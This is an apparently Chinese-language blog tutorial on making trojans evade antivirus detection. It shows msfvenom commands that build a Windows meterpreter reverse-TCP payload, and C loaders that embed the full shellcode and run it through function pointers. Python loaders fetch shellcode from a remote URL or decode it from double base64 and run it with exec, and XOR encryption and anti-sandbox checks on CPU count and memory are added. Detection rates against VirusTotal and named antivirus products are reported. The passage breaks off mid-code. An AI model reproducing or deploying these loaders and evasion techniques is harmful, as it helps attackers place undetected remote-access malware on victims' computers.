前言
这篇文章主要是记录手动编写代码进行木马免杀,使用工具也可以免杀,只不过太脚本小子了,而且工具的特征也容易被杀软抓到,指不定哪天就用不了了,所以要学一下手动去免杀木马,也方便以后开发一个只属于自己的木马
关于使用工具免杀的教程:
https://github.com/TideSec/BypassAntiVirus
工具安装
Visual studio
Visual studio:
https://visualstudio.microsoft.com/zh-hans/
这款工具可以将代码编译成exe文件,下载社区版即可
双击打开安装包,选择要安装的模块
点击安装后等待即可
安装完成后,点击启动就能运行Visual studio
登录时可以跳过登录,不需要注册账号
pyinstaller
pyinstaller模块可以将python脚本打包成exe文件,这里安装一下
pip3 install pyinstaller
python版本最好为python3.8.6
msfvenom
msfvenom是kali自带的一个工具,它可以生成各种的shellcode,还能对shellcode进行免杀,但是msfvenom的特征已经被杀软公司识别了,过杀软的可能性很低
列出msfvenom所有的payload
msfvenom --list payload
不同的系统所使用的payload也不一样,选择的连接方式也有很多
列出msfvenom所有的编码器
msfvenom --list encoders
这些都是msfvenom自带的一些免杀模块
使用c语言对木马进行免杀
比起使用c语言对木马进行免杀,我更喜欢用python对木马进行免杀,之后的制作木马也是用的python,这里c语言免杀木马只举两个简单的例子,大家可以直接去看python的木马免杀
指针执行
首先我们用msfvenom生成一个c语言的木马源代码,这里测试的平台是windows,所以payload也为常见的windows的paylaod,这里还使用了msfvenom自带的shikata_ga_nai编码器,提高一些免杀率
\x00指令是空指令,为了防止shellcode报错,这里去掉\x00
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.104 lport=4444 -f c -o shell.c
执行命令后,会在当前目录下生成一个shell.c文件,里面就是我们的shellcode
现在打开Visual studio,新建一个项目
然后选择空项目
最后自己设置文件保存的位置以及项目的名称
然后右击源文件
选择新建一个项
注意需要把后缀改为.c,然后点击添加
代码:
#include <windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") #运行时不弹出终端unsigned char buf[] =
"\xd9\xcc\xba\x62\xe7\x49\xd0\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x7b\x31\x56\x18\x03\x56\x18\x83\xee\x9e\x05\xbc\x0b\x91\x13"
"\x4b\x88\xd9\x1e\x42\x7e\xe9\x7f\xf5\x4c\x20\xce\x7d\x30\x74"
"\x35\x4f\x60\x6d\x35\xf9\x99\x99\x62\x75\xa8\x72\x53\x2e\x3d"
"\x5b\x82\xf9\x3f\xf8\x86\x1b\xbc\xec\xa4\xe8\x92\x51\x67\xd1"
"\xb0\x3b\x02\xdd\x0e\x08\x29\x83\x27\x4e\xcb\x88\x7b\x72\x85"
"\x13\x1d\xbc\x8c\xd8\x68\x57\x2c\x0b\xef\x9c\x80\x24\x76\x1a"
"\xb7\xc0\xa8\xe5\x06\x0c\x0e\x63\x09\x0a\x62\xf3\xda\xfd\x52"
"\x99\x0a\xe5\x17\x78\xf9\x3c\x60\xad\x1f\xfe\xb6\xe0\x9b\xf4"
"\x18\x20\x1b\x50\x4d\x47\x25\xf7\xb5\xe5\x0f\x99\xdc\xd1\x3d"
"\x3e\x57\x25\x8c\xab\x6c\xb6\x13\xb0\xe2\x7d\x95\x1f\xc6\x4f"
"\x35\xaf\x39\x75\xf4\x02\x80\x07\x89\xc2\x4a\xa3\xae\x25\xaa"
"\x4c\x70\x1d\x2a\x76\xe6\x2b\x67\xaf\x7c\x80\x83\x0b\x04\x38"
"\x30\x9d\x8a\x09\xdb\xaa\xff\x2a\x35\x89\x90\x1a\x81\xb2\x85"
"\x24\xa5\xd5\x96\x80\x77\xbc\x11\x3f\x0f\xbd\x7f\x8b\x52\xfc"
"\x8a\xc1\x2a\x11\xde\xac\xae\xe7\x54\x47\x2b\xfd\x53\xf4\xd8"
"\x85\xdb\x99\x4b\x66\x2f\x61\xe7\xd0\x66\x40\x60\x7f\xf1\xc3"
"\xee\x47\xe5\x30\xc2\x28\x65\xcc\x42\x3d\x44\x09\x3f\x05\x84"
"\x57\x78\x14\xd1\xac\xf8\x6b\x78\x07\x07\x7c\x12\x82\xf3\xfb"
"\x04\xa6\xb4\xad\x4c\xc2\xa7\x53\x79\xe7\xd1\x32\x54\xd2\xf4"
"\xb1\xaf\x4b\xd9\x58\xe1\x2a\x6c\x4c\xc4\x1a\xde\xf7\x1d\x86"
"\x50\xc2\x4c\x50\x96\x25\x96\xcb\x63\xd1\xa6\x2c\x59\x8b\x34"
"\xe4\xc0\x6b\x92\x63\xd6\x69\x15\x09\x3d\x26\xb2\xff\xd8\x6e"
"\xc9\xf4\xa9\x06\xd3\xc0\x7b\xfe\x99\xfa\x89\x67\x9e\x6c\x70"
"\xd4\xc2\x21\x35\x8d\xed\xf7\xe6\xf4\x4f\x7d\x49\xb9\x09\x14"
"\xc6\x31\x9c\xd0\x64\x45\x97\x9e\xc7\x02\x11\x98\x41\x36\x81"
"\xe8\xb6\x7b\x5d\xce\x2c\x25\x4c\x99\xf1\x4c\x9e\x0b\xb3\x4a"
"\x4d\xbf\x2a\x06\x37\x9e\x4f\xe3\x11\x7f\xdc\x4c\x23\xc9\xa1"
"\xca\xec\x5a\x28\xde\x61\x1a\x9c\x1b\xfa\x04\xc4\xb0\x17\xf6"
"\xe6\xa9\xf7\x23\x2b\xf1\xe9\x40\x59\x24\x5f\xc0\x6d\x41\x22"
"\x19\xd5\x17\xea\xd0\xaf\x5e\x41\x8b\x73\x64\x70\x8d\xee\x94"
"\xc6\x1b\x59\x57\x37\x34\x4f\x85\x42\xd0\xdb\x4e\xdf\x25\xa2"
"\xe0\x35\xaf\x74\xd1\xc8\x96\x68\xd2\x2a\xa1\xd9\xf9\xeb\xaf"
"\xef\x5e\x85\xce\x84\xc3\x0c\xa1\x8b\x13\x3b\x19\xeb\xb6\x86"
"\x1a\xe5\xe7\xa5\x22\x6f"; #msfvenom生成的shellcodemain()
{((void(*)(void)) & buf)(); #利用指针来执行函数
}
然后ctrl+b生成exe文件
找到文件地址
virustotal网站测试
现在就来测试能过多少个杀软,这里用一个在线的病毒分析网站
https://www.virustotal.com/gui/home/upload
选择我们制作的木马文件
点击上传
通过率为15/69
微步云沙箱
微步云沙箱是一个国内测试病毒的在线网站
https://s.threatbook.com/
通过率为4/22
实战测试
腾讯电脑管家,火绒,windows defender没报毒,360报毒
总结
只是利用指针执行函数过了大部分杀软,可是还是有一些过不了,但是我们可以打组合拳
指针执行+类型转换
还是上面那些代码,只不过新加了一个类型转换的代码
#include <windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")unsigned char buf[] =
"\xd9\xcc\xba\x62\xe7\x49\xd0\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x7b\x31\x56\x18\x03\x56\x18\x83\xee\x9e\x05\xbc\x0b\x91\x13"
"\x4b\x88\xd9\x1e\x42\x7e\xe9\x7f\xf5\x4c\x20\xce\x7d\x30\x74"
"\x35\x4f\x60\x6d\x35\xf9\x99\x99\x62\x75\xa8\x72\x53\x2e\x3d"
"\x5b\x82\xf9\x3f\xf8\x86\x1b\xbc\xec\xa4\xe8\x92\x51\x67\xd1"
"\xb0\x3b\x02\xdd\x0e\x08\x29\x83\x27\x4e\xcb\x88\x7b\x72\x85"
"\x13\x1d\xbc\x8c\xd8\x68\x57\x2c\x0b\xef\x9c\x80\x24\x76\x1a"
"\xb7\xc0\xa8\xe5\x06\x0c\x0e\x63\x09\x0a\x62\xf3\xda\xfd\x52"
"\x99\x0a\xe5\x17\x78\xf9\x3c\x60\xad\x1f\xfe\xb6\xe0\x9b\xf4"
"\x18\x20\x1b\x50\x4d\x47\x25\xf7\xb5\xe5\x0f\x99\xdc\xd1\x3d"
"\x3e\x57\x25\x8c\xab\x6c\xb6\x13\xb0\xe2\x7d\x95\x1f\xc6\x4f"
"\x35\xaf\x39\x75\xf4\x02\x80\x07\x89\xc2\x4a\xa3\xae\x25\xaa"
"\x4c\x70\x1d\x2a\x76\xe6\x2b\x67\xaf\x7c\x80\x83\x0b\x04\x38"
"\x30\x9d\x8a\x09\xdb\xaa\xff\x2a\x35\x89\x90\x1a\x81\xb2\x85"
"\x24\xa5\xd5\x96\x80\x77\xbc\x11\x3f\x0f\xbd\x7f\x8b\x52\xfc"
"\x8a\xc1\x2a\x11\xde\xac\xae\xe7\x54\x47\x2b\xfd\x53\xf4\xd8"
"\x85\xdb\x99\x4b\x66\x2f\x61\xe7\xd0\x66\x40\x60\x7f\xf1\xc3"
"\xee\x47\xe5\x30\xc2\x28\x65\xcc\x42\x3d\x44\x09\x3f\x05\x84"
"\x57\x78\x14\xd1\xac\xf8\x6b\x78\x07\x07\x7c\x12\x82\xf3\xfb"
"\x04\xa6\xb4\xad\x4c\xc2\xa7\x53\x79\xe7\xd1\x32\x54\xd2\xf4"
"\xb1\xaf\x4b\xd9\x58\xe1\x2a\x6c\x4c\xc4\x1a\xde\xf7\x1d\x86"
"\x50\xc2\x4c\x50\x96\x25\x96\xcb\x63\xd1\xa6\x2c\x59\x8b\x34"
"\xe4\xc0\x6b\x92\x63\xd6\x69\x15\x09\x3d\x26\xb2\xff\xd8\x6e"
"\xc9\xf4\xa9\x06\xd3\xc0\x7b\xfe\x99\xfa\x89\x67\x9e\x6c\x70"
"\xd4\xc2\x21\x35\x8d\xed\xf7\xe6\xf4\x4f\x7d\x49\xb9\x09\x14"
"\xc6\x31\x9c\xd0\x64\x45\x97\x9e\xc7\x02\x11\x98\x41\x36\x81"
"\xe8\xb6\x7b\x5d\xce\x2c\x25\x4c\x99\xf1\x4c\x9e\x0b\xb3\x4a"
"\x4d\xbf\x2a\x06\x37\x9e\x4f\xe3\x11\x7f\xdc\x4c\x23\xc9\xa1"
"\xca\xec\x5a\x28\xde\x61\x1a\x9c\x1b\xfa\x04\xc4\xb0\x17\xf6"
"\xe6\xa9\xf7\x23\x2b\xf1\xe9\x40\x59\x24\x5f\xc0\x6d\x41\x22"
"\x19\xd5\x17\xea\xd0\xaf\x5e\x41\x8b\x73\x64\x70\x8d\xee\x94"
"\xc6\x1b\x59\x57\x37\x34\x4f\x85\x42\xd0\xdb\x4e\xdf\x25\xa2"
"\xe0\x35\xaf\x74\xd1\xc8\x96\x68\xd2\x2a\xa1\xd9\xf9\xeb\xaf"
"\xef\x5e\x85\xce\x84\xc3\x0c\xa1\x8b\x13\x3b\x19\xeb\xb6\x86"
"\x1a\xe5\xe7\xa5\x22\x6f";int buf_s() {((void(*)(void)) & buf)(); #通过指针运行函数
}
void main()
{((void(WINAPI*)(void)) & buf_s)(); #类型转换
}
virustotal网站测试
通过率为13/70,比第一次大了一些
微步云沙箱
通过率为2/22
实战测试
和第一个一样,腾讯电脑管家,火绒,windows defender没报毒,360报毒
总结
指针执行+类型转换将免杀率提升了一点,但是使用python免杀比使用c语言进行免杀方便
使用python对木马免杀
比起使用c语言对木马进行免杀,我更喜欢用python对木马进行免杀
远程加载
生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.104 lport=4444 -f python -o shell.txt
我们可以不用把shellcode写死在程序里,可以使用urllib.request模块去远程获取shellcode代码并加载
import urllib.requestbuf = urllib.request.urlopen('http://ip/shellcode.txt').read()
buf = buf.decode('utf-8')page = ctypes.windll.kernel32.VirtualAlloc(0, len(buf), 0x1000, 0x40)
//申请内存ctypes.windll.kernel32.RtlMoveMemory(page, ctypes.create_string_buffer(buf), len(buf))
handle = ctypes.windll.kernel32.CreateThread(0, 0, page, 0, 0, 0)
//创建线程ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
//把程序加载到内存里并运行shellcode
pyinstaller打包
pyinstaller -F test.py
这种方法只是一个思路,无法动态过杀软,杀软对加载到内存的代码也敏感
内容加密
我们可以对内容进行加密,增加免杀率
base64
可以使用base64对敏感代码加密后再解密执行
import ctypes
import base64shellcode ='WEhoaFpGeDRPV1ZjZUdKa1hIZ3hNVng0TlRkY2VEa3hYSGd6WkZ4NE5EVmNlR0V3WEhoa1pseDRNelZjZURneVhIZzNNVng0TXpSY2VHTTFYSGd4TWx4NE5UVmNlRE5pWEhnMllseDRaVFpjZURoa1hIZzRPRng0Tm1GY2VETmhYSGd5TVZ4NE5qQmNlRGcwWEhobFpGeDRaRFJjZURBMVhIZ3daRng0TUdaY2VHTmpYSGhpWmx4NFpEUmNlRGhqWEhobU1seDROR05jZURkalhIZzBNMXg0TkdaY2VEQXlYSGhoTmx4NE5tRmNlR0kyWEhobVpWeDRObUpjZURkbVhIZzFNRng0Tm1KY2VEazVYSGczWVZ4NFlUZGNlR015WEhnME4xeDRNelpjZUdZM1hIZ3dZMXg0WTJSY2VHUmlYSGhsTlZ4NE9EQmNlR1F6WEhobU9GeDRNVFJjZURFeVhIaG1NRng0WW1KY2VHSmpYSGd3TjF4NE1qWmNlREprWEhnNU5seDRabU5jZURoaFhIZ3dNVng0WTJaY2VESXlYSGcwTlZ4NFpHWmNlRFF4WEhobE1seDROekZjZUdKalhIZzNNbHg0TnpoY2VETmhYSGhsWTF4NE1qQmNlR0l3WEhoaU1GeDRNRFpjZUdOalhIZzFaVng0WlROY2VHWm1YSGc1WTF4NE56WmNlRGxtWEhnMlpGeDROVEJjZUROaFhIZzVOVng0TlRWY2VEVmlYSGhrTlZ4NFpEZGNlRFEwWEhnNFlseDRNV0pjZURrd1hIaGpabHg0T1RSY2VEY3lYSGcyTlZ4NE9EUmNlREV6WEhobE9GeDRPRFZjZURabVhIZzJORng0TWpkY2VEZzVYSGhpWlZ4NE56aGNlRFJoWEhneFkxeDRaalpjZURGalhIZ3dPRng0T0RKY2VEWmpYSGhpWVZ4NE1qZGNlRFJtWEhnM1kxeDRZV1JjZUdVM1hIaGpNVng0WVRCY2VHWTBYSGcyT0Z4NFpXRmNlRFZrWEhoa05GeDRZakJjZURFMVhIZ3pPRng0TVRSY2VEazBYSGc1TVZ4NFlXVmNlRFkwWEhnME1WeDRZbU5jZURrNVhIZzJaRng0TlRaY2VHUm1YSGhtWkZ4NE1ETmNlRGRrWEhoa1pseDRaamxjZURVeVhIaGxPRng0WkRKY2VETXlYSGcwTWx4NE4yUmNlRFl3WEhnd05GeDRNalpjZUdKbVhIZ3lObHg0TWpGY2VHTTRYSGd3TUZ4NE5UZGNlR1UwWEhnMk4xeDROR1JjZURZMlhIZzNNRng0TldOY2VERmpYSGd6Tmx4NFptVmNlR0V4WEhoak5WeDRZbUpjZURZNVhIaGxOMXg0TkRoY2VEZG1YSGhrWVZ4NE9EUmNlR1prWEhnMVlWeDRNelpjZUdNMlhIaG1ZbHg0T1RoY2VESXpYSGhtTmx4NFlUUmNlR014WEhobU9WeDROVGRjZURsbVhIZ3lNMXg0WXpGY2VEZ3hYSGd3TUZ4NFpXSmNlR1EyWEhoaU1WeDROek5jZURrMFhIaGxaVng0TWpkY2VHWmhYSGhsTWx4NE5HWmNlR0l4WEhnM09GeDRNR1ZjZURNMFhIZ3pNMXg0TmpOY2VEaGlYSGhqTkZ4NFpEbGNlR1V3WEhnd1pGeDRPRFpjZUdJMVhIZ3labHg0WldaY2VEZGlYSGhtWWx4NE9ERmNlR05qWEhneU5WeDRaV0ZjZURaaFhIZzFZMXg0TUdKY2VHSTVYSGhrWkZ4NFpEaGNlRFpqWEhnNE1seDRaVFJjZUdFM1hIZ3hNMXg0WTJSY2VHVTJYSGc1WlZ4NFpqaGNlR1V3WEhnMU4xeDRaVFJjZURFNVhIaGtaRng0WkdOY2VHSmxYSGd6WlZ4NFpUSmNlR0V6WEhnek9GeDRaV1JjZURFNVhIaGpOMXg0TjJSY2VHVXdYSGd6TjF4NFlUaGNlRFpoWEhneVpseDRPRFpjZUdJd1hIZzJZVng0WTJWY2VHTXpYSGhoWlZ4NE4yWmNlRGcwWEhoa05WeDRaamRjZURNMVhIZ3dPRng0TkRGY2VEazFYSGczTlZ4NFpXTmNlREZrWEhnelkxeDRNVFpjZURVNVhIaG1PVng0TlRGY2VEVmlYSGhqTTF4NE1tWmNlR1psWEhneE5WeDRaRFZjZUdVM1hIZzRObHg0T1ROY2VHRTRYSGcwTkZ4NE5HRmNlRGczWEhoaFkxeDRNakpjZUdZMVhIaGpOMXg0TkRoY2VETXpYSGhqTjF4NE5XWmNlR1JpWEhneU1GeDRaRFpjZURnd1hIZzVORng0TlRkY2VEVm1YSGhqTkZ4NE1XRmNlR0k1WEhoaU5seDRaVFpjZURRNFhIZzBOMXg0TnpWY2VEQTBYSGc0Tmx4NE9HTmNlREUyWEhoak4xeDRNbU5jZUdKaVhIZ3daRng0WXpSY2VEWmxYSGd5T0Z4NE1qSmNlRGRrWEhoalpseDRNVGxjZURZMFhIZzBPRng0TkdWY2VEWmtYSGhoT0Z4NFlqZGNlR0UwWEhnM05seDROVFJjZURRNVhIaGpPVng0TkRKY2VHTTNYSGd3WWx4NE9ESmNlR0ZrWEhnd1pWeDRNakJjZURZNVhIaGtOMXg0T1RoY2VHSTBYSGhpWWx4NFpESmNlRFV6WEhnelkxeDROelZjZURRd1hIaGtNMXg0TTJGY2VETmlYSGczT0Z4NFlXRmNlR014WEhneU5GeDROVFJjZURaalhIaGxOVng0TVdSY2VEQmxYSGhsTkZ4NFpUbGNlREU0WEhnMk1WeDRNVFpjZURFMlhIZzNNRng0WW1aY2VETTBYSGcxTlZ4NFpqSmNlRGd5WEhneVkxeDRNak5jZUdFMlhIZzBNbHg0TURGY2VEbGpYSGd5WVZ4NFlqTmNlR1ppWEhnek1seDRZakJjZURBd1hIZzFOVng0WlROY2VHUmpYSGc0TjF4NE5UUmNlR0ZrWEhobFpWeDRNMk5jZURsa1hIZzNOMXg0WkRsY2VEUmtYSGhtTWx4NE5UaGNlRFV3WEhoaVpseDRaREJjZURZNVhIZ3lZVng0TkdWY2VEVTFYSGhtWlZ4NE5HTmNlRGcwWEhoaU9WeDRPRFJjZUdZelhIaGpZMXg0WTJWY2VEbGpYSGhoWkZ4NE0yVmNlREJpWEhnME1WeDRNRGxjZURBeFhIZzNOMXg0TlROY2VHRTJYSGhrTUZ4NFpEVmNlR1JtWEhnMlpseDROamhjZURJM1hIZzRObHg0TldSY2VEZGpYSGcyWVZ4NE1tRmNlRFUxWEhnNE9WeDRPRFJjZUdFMFhIZ3dNVng0WVRKY2VEQTFYSGhtTlZ4NFltVmNlR1F4WEhnd05WeDRNR05jZUdJelhIZzVPRng0WTJSY2VEQTFYSGd6TTF4NFlqbGNlRFU0WEhnelpWeDRNbVZjZURBd1hIaGlabHg0WTJKY2VHTmtYSGd4Tmx4NE56aGNlR1EwWEhoaE5seDRZamRjZUdFd1hIZ3pabHg0TTJGY2VHRmtYSGc1TWx4NE5tWmNlRGxrWEhneVpGeDROVE5jZUdOaVhIZzFNRng0TmpCY2VERXhYSGhsWkZ4NE9ESmNlRFU1WEhneE9WeDRZVFpjZUdZdw=='
//对shellcode进行了两次的base64加密shellcode = base64.b64decode(base64.b64decode(shellcode))
//进行两次shellcode解密shellcode = shellcode.decode('utf-8')
loader = "Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZT1jdHlwZXMuY191aW50NjQ7cnd4cGFnZSA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKDAsIGxlbihzaGVsbGNvZGUpLCAweDEwMDAsIDB4NDApO2N0eXBlcy53aW5kbGwua2VybmVsMzIuUnRsTW92ZU1lbW9yeShjdHlwZXMuY191aW50NjQocnd4cGFnZSksIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSk7aGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoMCwgMCwgY3R5cGVzLmNfdWludDY0KHJ3eHBhZ2UpLCAwLCAwLCAwKTtjdHlwZXMud2luZGxsLmtlcm5lbDMyLldhaXRGb3JTaW5nbGVPYmplY3QoaGFuZGxlLCAtMSk="
//对加载内存里并运行shellcode的代码进行了一次base64加密exec (base64.b64decode(loader))
//使用exec函数执行loader变量里的代码
打包
pyinstaller -F test.py
静态能过360全家桶,火绒,腾讯管家和微软
在线网站还是老样子
xor加密
也可以使用异或加密来对木马进行免杀
加密:
def enc(shellcode, key):result = ''for i in range(len(shellcode)):result += chr(ord(shellcode[i]) ^ key)return result
//xor加密shellcode = ""
//要加密的shellcodekey = 9
enc_shellcode = enc(shellcode, key)
//获得加密后的shellcodeprint(enc_shellcode)
解密:
def enc(shellcode, key):result = ''for i in range(len(shellcode)):result += chr(ord(shellcode[i]) ^ key)return resultenc_shellcode = ""
//加密后的shellcode代码key = 9shellcode = enc(enc_shellcode,key).encode()
//进行解密
总结
除了xor加密,还可以使用aes之类的加密方式,也可以使用python里的Cryptography库进行加解密,大家可以自行研发
反沙箱
在线网站和一些杀软会生成一个沙箱,去运行程序并检测,一般这个沙箱很小
通过cup核心数判断是否是沙箱
from multiprocessing import cpu_count
import base64
import ctypescpu_num = cpu_count()
判断cpu核心数if(cpu_num >= 4):
//如果cpu核心数大于4就执行shellcodeshellcode ='WEhoaFpGeDRPV1ZjZUdKa1hIZ3hNVng0TlRkY2VEa3hYSGd6WkZ4NE5EVmNlR0V3WEhoa1pseDRNelZjZURneVhIZzNNVng0TXpSY2VHTTFYSGd4TWx4NE5UVmNlRE5pWEhnMllseDRaVFpjZURoa1hIZzRPRng0Tm1GY2VETmhYSGd5TVZ4NE5qQmNlRGcwWEhobFpGeDRaRFJjZURBMVhIZ3daRng0TUdaY2VHTmpYSGhpWmx4NFpEUmNlRGhqWEhobU1seDROR05jZURkalhIZzBNMXg0TkdaY2VEQXlYSGhoTmx4NE5tRmNlR0kyWEhobVpWeDRObUpjZURkbVhIZzFNRng0Tm1KY2VEazVYSGczWVZ4NFlUZGNlR015WEhnME4xeDRNelpjZUdZM1hIZ3dZMXg0WTJSY2VHUmlYSGhsTlZ4NE9EQmNlR1F6WEhobU9GeDRNVFJjZURFeVhIaG1NRng0WW1KY2VHSmpYSGd3TjF4NE1qWmNlREprWEhnNU5seDRabU5jZURoaFhIZ3dNVng0WTJaY2VESXlYSGcwTlZ4NFpHWmNlRFF4WEhobE1seDROekZjZUdKalhIZzNNbHg0TnpoY2VETmhYSGhsWTF4NE1qQmNlR0l3WEhoaU1GeDRNRFpjZUdOalhIZzFaVng0WlROY2VHWm1YSGc1WTF4NE56WmNlRGxtWEhnMlpGeDROVEJjZUROaFhIZzVOVng0TlRWY2VEVmlYSGhrTlZ4NFpEZGNlRFEwWEhnNFlseDRNV0pjZURrd1hIaGpabHg0T1RSY2VEY3lYSGcyTlZ4NE9EUmNlREV6WEhobE9GeDRPRFZjZURabVhIZzJORng0TWpkY2VEZzVYSGhpWlZ4NE56aGNlRFJoWEhneFkxeDRaalpjZURGalhIZ3dPRng0T0RKY2VEWmpYSGhpWVZ4NE1qZGNlRFJtWEhnM1kxeDRZV1JjZUdVM1hIaGpNVng0WVRCY2VHWTBYSGcyT0Z4NFpXRmNlRFZrWEhoa05GeDRZakJjZURFMVhIZ3pPRng0TVRSY2VEazBYSGc1TVZ4NFlXVmNlRFkwWEhnME1WeDRZbU5jZURrNVhIZzJaRng0TlRaY2VHUm1YSGhtWkZ4NE1ETmNlRGRrWEhoa1pseDRaamxjZURVeVhIaGxPRng0WkRKY2VETXlYSGcwTWx4NE4yUmNlRFl3WEhnd05GeDRNalpjZUdKbVhIZ3lObHg0TWpGY2VHTTRYSGd3TUZ4NE5UZGNlR1UwWEhnMk4xeDROR1JjZURZMlhIZzNNRng0TldOY2VERmpYSGd6Tmx4NFptVmNlR0V4WEhoak5WeDRZbUpjZURZNVhIaGxOMXg0TkRoY2VEZG1YSGhrWVZ4NE9EUmNlR1prWEhnMVlWeDRNelpjZUdNMlhIaG1ZbHg0T1RoY2VESXpYSGhtTmx4NFlUUmNlR014WEhobU9WeDROVGRjZURsbVhIZ3lNMXg0WXpGY2VEZ3hYSGd3TUZ4NFpXSmNlR1EyWEhoaU1WeDROek5jZURrMFhIaGxaVng0TWpkY2VHWmhYSGhsTWx4NE5HWmNlR0l4WEhnM09GeDRNR1ZjZURNMFhIZ3pNMXg0TmpOY2VEaGlYSGhqTkZ4NFpEbGNlR1V3WEhnd1pGeDRPRFpjZUdJMVhIZ3labHg0WldaY2VEZGlYSGhtWWx4NE9ERmNlR05qWEhneU5WeDRaV0ZjZURaaFhIZzFZMXg0TUdKY2VHSTVYSGhrWkZ4NFpEaGNlRFpqWEhnNE1seDRaVFJjZUdFM1hIZ3hNMXg0WTJSY2VHVTJYSGc1WlZ4NFpqaGNlR1V3WEhnMU4xeDRaVFJjZURFNVhIaGtaRng0WkdOY2VHSmxYSGd6WlZ4NFpUSmNlR0V6WEhnek9GeDRaV1JjZURFNVhIaGpOMXg0TjJSY2VHVXdYSGd6TjF4NFlUaGNlRFpoWEhneVpseDRPRFpjZUdJd1hIZzJZVng0WTJWY2VHTXpYSGhoWlZ4NE4yWmNlRGcwWEhoa05WeDRaamRjZURNMVhIZ3dPRng0TkRGY2VEazFYSGczTlZ4NFpXTmNlREZrWEhnelkxeDRNVFpjZURVNVhIaG1PVng0TlRGY2VEVmlYSGhqTTF4NE1tWmNlR1psWEhneE5WeDRaRFZjZUdVM1hIZzRObHg0T1ROY2VHRTRYSGcwTkZ4NE5HRmNlRGczWEhoaFkxeDRNakpjZUdZMVhIaGpOMXg0TkRoY2VETXpYSGhqTjF4NE5XWmNlR1JpWEhneU1GeDRaRFpjZURnd1hIZzVORng0TlRkY2VEVm1YSGhqTkZ4NE1XRmNlR0k1WEhoaU5seDRaVFpjZURRNFhIZzBOMXg0TnpWY2VEQTBYSGc0Tmx4NE9HTmNlREUyWEhoak4xeDRNbU5jZUdKaVhIZ3daRng0WXpSY2VEWmxYSGd5T0Z4NE1qSmNlRGRrWEhoalpseDRNVGxjZURZMFhIZzBPRng0TkdWY2VEWmtYSGhoT0Z4NFlqZGNlR0UwWEhnM05seDROVFJjZURRNVhIaGpPVng0TkRKY2VHTTNYSGd3WWx4NE9ESmNlR0ZrWEhnd1pWeDRNakJjZURZNVhIaGtOMXg0T1RoY2VHSTBYSGhpWWx4NFpESmNlRFV6WEhnelkxeDROelZjZURRd1hIaGtNMXg0TTJGY2VETmlYSGczT0Z4NFlXRmNlR014WEhneU5GeDROVFJjZURaalhIaGxOVng0TVdSY2VEQmxYSGhsTkZ4NFpUbGNlREU0WEhnMk1WeDRNVFpjZURFMlhIZzNNRng0WW1aY2VETTBYSGcxTlZ4NFpqSmNlRGd5WEhneVkxeDRNak5jZUdFMlhIZzBNbHg0TURGY2VEbGpYSGd5WVZ4NFlqTmNlR1ppWEhnek1seDRZakJjZURBd1hIZzFOVng0WlROY2VHUmpYSGc0TjF4NE5UUmNlR0ZrWEhobFpWeDRNMk5jZURsa1hIZzNOMXg0WkRsY2VEUmtYSGhtTWx4NE5UaGNlRFV3WEhoaVpseDRaREJjZURZNVhIZ3lZVng0TkdWY2VEVTFYSGhtWlZ4NE5HTmNlRGcwWEhoaU9WeDRPRFJjZUdZelhIaGpZMXg0WTJWY2VEbGpYSGhoWkZ4NE0yVmNlREJpWEhnME1WeDRNRGxjZURBeFhIZzNOMXg0TlROY2VHRTJYSGhrTUZ4NFpEVmNlR1JtWEhnMlpseDROamhjZURJM1hIZzRObHg0TldSY2VEZGpYSGcyWVZ4NE1tRmNlRFUxWEhnNE9WeDRPRFJjZUdFMFhIZ3dNVng0WVRKY2VEQTFYSGhtTlZ4NFltVmNlR1F4WEhnd05WeDRNR05jZUdJelhIZzVPRng0WTJSY2VEQTFYSGd6TTF4NFlqbGNlRFU0WEhnelpWeDRNbVZjZURBd1hIaGlabHg0WTJKY2VHTmtYSGd4Tmx4NE56aGNlR1EwWEhoaE5seDRZamRjZUdFd1hIZ3pabHg0TTJGY2VHRmtYSGc1TWx4NE5tWmNlRGxrWEhneVpGeDROVE5jZUdOaVhIZzFNRng0TmpCY2VERXhYSGhsWkZ4NE9ESmNlRFU1WEhneE9WeDRZVFpjZUdZdw=='//对shellcode进行了两次的base64加密shellcode = base64.b64decode(base64.b64decode(shellcode))//进行两次shellcode解密shellcode = shellcode.decode('utf-8')loader = "Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZT1jdHlwZXMuY191aW50NjQ7cnd4cGFnZSA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKDAsIGxlbihzaGVsbGNvZGUpLCAweDEwMDAsIDB4NDApO2N0eXBlcy53aW5kbGwua2VybmVsMzIuUnRsTW92ZU1lbW9yeShjdHlwZXMuY191aW50NjQocnd4cGFnZSksIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSk7aGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoMCwgMCwgY3R5cGVzLmNfdWludDY0KHJ3eHBhZ2UpLCAwLCAwLCAwKTtjdHlwZXMud2luZGxsLmtlcm5lbDMyLldhaXRGb3JTaW5nbGVPYmplY3QoaGFuZGxlLCAtMSk="//对加载内存里并运行shellcode的代码进行了一次base64加密exec (base64.b64decode(loader))//使用exec函数执行loader变量里的代码else:
//核心数小于4就退出print("no sandbox")
打包
pyinstaller -F test.py
但是shellcode特征太明显了,因为是用msf生成的,所以还是老样子,之后自己写的话就会好很多
通过物理内存判断是否是沙箱
import psutilall_memory = psutil.virtual_memory().total
//获取内存总大小use_memory = psutil.virtual_memory().used
